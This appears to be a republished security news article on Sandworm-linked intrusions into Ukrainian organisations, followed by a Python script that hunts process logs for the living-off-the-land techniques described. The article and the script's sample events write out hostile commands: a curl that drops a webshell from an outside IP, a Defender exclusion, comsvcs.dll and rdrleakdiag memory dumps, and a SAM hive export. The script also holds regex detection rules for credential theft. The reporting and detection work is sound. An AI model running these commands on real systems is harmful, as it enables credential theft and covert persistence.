Ukrainian Government Entities Under Siege by Cyber Threats
Ukrainian governmental organizations are currently grappling with unrelenting cyber incursions orchestrated by Russian-affiliated threat actors. These adversaries are employing intricate evasion strategies designed to maintain continuous access to sensitive networks.
Recent investigations have unveiled a series of meticulously coordinated campaigns targeting vital infrastructure and government agencies. The attackers are utilizing advanced methodologies that successfully bypass conventional security frameworks.
This surge in cyber operations signifies a notable intensification in targeting strategies, predominantly concentrating on credential harvesting and the extraction of sensitive information, rather than immediate acts of digital sabotage.
The ongoing assaults illustrate a tactical evolution towards prolonged network infiltration, enabling these cyber operatives to conduct thorough reconnaissance while establishing a covert presence over the course of several months.
Symantec analysts have identified two principal intrusion events: one spanning a two-month period against a substantial business services firm and another lasting a week targeting local government infrastructures.
The attackers exhibit remarkable operational security acumen, deliberately minimizing malware usage and relying predominantly on legitimate Windows administration tools in conjunction with dual-use software to elude detection.
Connections to Sandworm and Initial Compromise Details
This campaign is reportedly linked to Sandworm, a unit within the Russian military intelligence (GRU), notorious for its destructive attacks against critical infrastructures such as power grids and satellite communication networks.
The initial breach was facilitated through the deployment of webshells on publicly accessible servers, likely exploiting vulnerabilities that remain unpatched. The threat actors utilized the Localolive webshell, thereby establishing a persistent backdoor for remote command execution.
Living-Off-the-Land Credential Harvesting Mechanisms
The sophisticated evasion tactics deployed by these actors reveal a nuanced understanding of contemporary security measures.
Upon achieving initial access on June 27, 2025, the attackers immediately executed reconnaissance commands using built-in Windows utilities:
cmd.exe /c curl 185.145.245.209:22065/service.aspx > C:\inetpub\wwwroot\aspnet_client\service.aspx
powershell Add-MpPreference -ExclusionPath CSIDL_PROFILE\downloads
With the second command they intentionally disabled Windows Defender scanning within the Downloads folder, an action that requires elevated privileges.
Subsequently, the attackers created scheduled tasks that ran every thirty minutes, invoking the legitimate rundll32.exe with comsvcs.dll to dump process memory and extract the credentials held in it.
Specifically, they enumerated KeePass password vault processes, reflecting a calculated targeting of credential repositories.
The evasion techniques continued with the Windows Resource Leak Diagnostic tool (rdrleakdiag) being used to dump process memory, a rarely employed method that helps circumvent security monitoring.
Additionally, exporting registry hives with native reg.exe commands gave the attackers a further route to credentials and configuration data.
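To show how a defender can hunt for the sequence just described, the following Python is an added example (not code from the article, from Symantec or from Cybersecuritynews.com). It runs simple command-line rules over constructed process-creation events (for instance Sysmon Event ID 1 or Security 4688 exported to JSON) and then correlates per host, because a Defender exclusion followed by scheduled comsvcs.dll dumps is a far stronger signal than either hit alone. The event field names (host, image, cmdline), the sample events other than the two commands quoted above, and the rdrleakdiag flags are assumptions.

```python
"""Hunt process-creation events for the living-off-the-land tradecraft above.
Assumed event shape: dicts with 'host', 'image' and 'cmdline' (field names are an
assumption; adapt to your log pipeline)."""
import re
from typing import Dict, List, Set, Tuple

# (rule name, tactic, regex over the full command line); case-insensitive and
# tolerant of argument spacing so small variations do not slip past.
RULES: List[Tuple[str, str, re.Pattern]] = [
    ("defender_exclusion_added", "defense-evasion",
     re.compile(r"add-mppreference.*-exclusion(path|process|extension)", re.I)),
    ("comsvcs_minidump", "credential-access",
     re.compile(r"rundll32(\.exe)?\s+.*comsvcs(\.dll)?\s*,?\s*(#24|minidump)", re.I)),
    ("rdrleakdiag_dump", "credential-access",   # flags assumed from common usage
     re.compile(r"rdrleakdiag(\.exe)?\s+.*(/p\b|/fullmemdmp)", re.I)),
    ("reg_hive_export", "credential-access",
     re.compile(r"reg(\.exe)?\s+save\s+hklm\\(sam|system|security)", re.I)),
    ("webshell_dropped_via_curl", "persistence",
     re.compile(r"curl\s+.*>\s*c:\\inetpub\\wwwroot\\.*\.aspx", re.I)),
    ("keepass_process_enum", "discovery",
     re.compile(r"(tasklist|get-process).*keepass", re.I)),
    ("schtasks_30min_dump", "persistence",
     re.compile(r"schtasks.*/sc\s+minute\s+/mo\s+30.*comsvcs", re.I)),
]

# Constructed sample telemetry. The first two command lines are the ones quoted
# in the article; every other event, host name and PID is made up for the demo.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "web01", "image": "cmd.exe",
     "cmdline": r"cmd.exe /c curl 185.145.245.209:22065/service.aspx > C:\inetpub\wwwroot\aspnet_client\service.aspx"},
    {"host": "web01", "image": "powershell.exe",
     "cmdline": r"powershell Add-MpPreference -ExclusionPath CSIDL_PROFILE\downloads"},
    {"host": "web01", "image": "schtasks.exe",
     "cmdline": r'schtasks /create /sc minute /mo 30 /tn "SysCheck" /tr "rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\Users\svc\Downloads\l.dmp full"'},
    {"host": "web01", "image": "cmd.exe",
     "cmdline": r'tasklist /fi "imagename eq KeePass.exe"'},
    {"host": "web01", "image": "rdrleakdiag.exe",
     "cmdline": r"rdrleakdiag.exe /p 624 /o C:\Users\svc\Downloads /fullmemdmp /wait 1"},
    {"host": "web01", "image": "reg.exe",
     "cmdline": r"reg save HKLM\SAM C:\Users\svc\Downloads\sam.hiv"},
    # Ordinary administration on another host; must not raise any finding.
    {"host": "fs02", "image": "reg.exe",
     "cmdline": r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"},
    {"host": "fs02", "image": "powershell.exe",
     "cmdline": r"powershell Get-MpPreference"},
]


def rule_names(cmdline: str) -> List[str]:
    """Names of every rule matching one command line, in RULES order."""
    return [name for name, _tactic, pattern in RULES if pattern.search(cmdline)]


def scan_events(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """One finding per (event, rule) pair, preserving event order."""
    findings = []
    for ev in events:
        cmdline = ev.get("cmdline", "")
        for name, tactic, pattern in RULES:
            if pattern.search(cmdline):
                findings.append({"host": ev.get("host", "?"), "rule": name,
                                 "tactic": tactic, "cmdline": cmdline})
    return findings


def correlate(findings: List[Dict[str, str]]) -> List[str]:
    """Hosts showing credential access combined with an evasion or persistence
    step: the chain the article describes, rather than an isolated admin command."""
    tactics_by_host: Dict[str, Set[str]] = {}
    for f in findings:
        tactics_by_host.setdefault(f["host"], set()).add(f["tactic"])
    return sorted(host for host, tactics in tactics_by_host.items()
                  if "credential-access" in tactics
                  and tactics & {"defense-evasion", "persistence"})


if __name__ == "__main__":
    hits = scan_events(SAMPLE_EVENTS)
    for h in hits:
        print(f"{h['host']:6} {h['tactic']:18} {h['rule']:26} {h['cmdline'][:60]}")
    print("hosts needing triage:", correlate(hits))
```

The correlation step is the part worth keeping even if the individual regexes are swapped for your SIEM's own rules: a single reg.exe or rundll32.exe invocation is routine on many hosts, whereas the combination of an exclusion change and repeated memory dumps on the same machine, spread over days, is the pattern the campaign relied on to stay quiet.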
This campaign underscores a prioritization of stealth over speed, with the threat actors adeptly leveraging legitimate administration tools to maintain ambiguity regarding attribution while systematically harvesting sensitive organizational data throughout extended periods of network access.
Source link: Cybersecuritynews.com.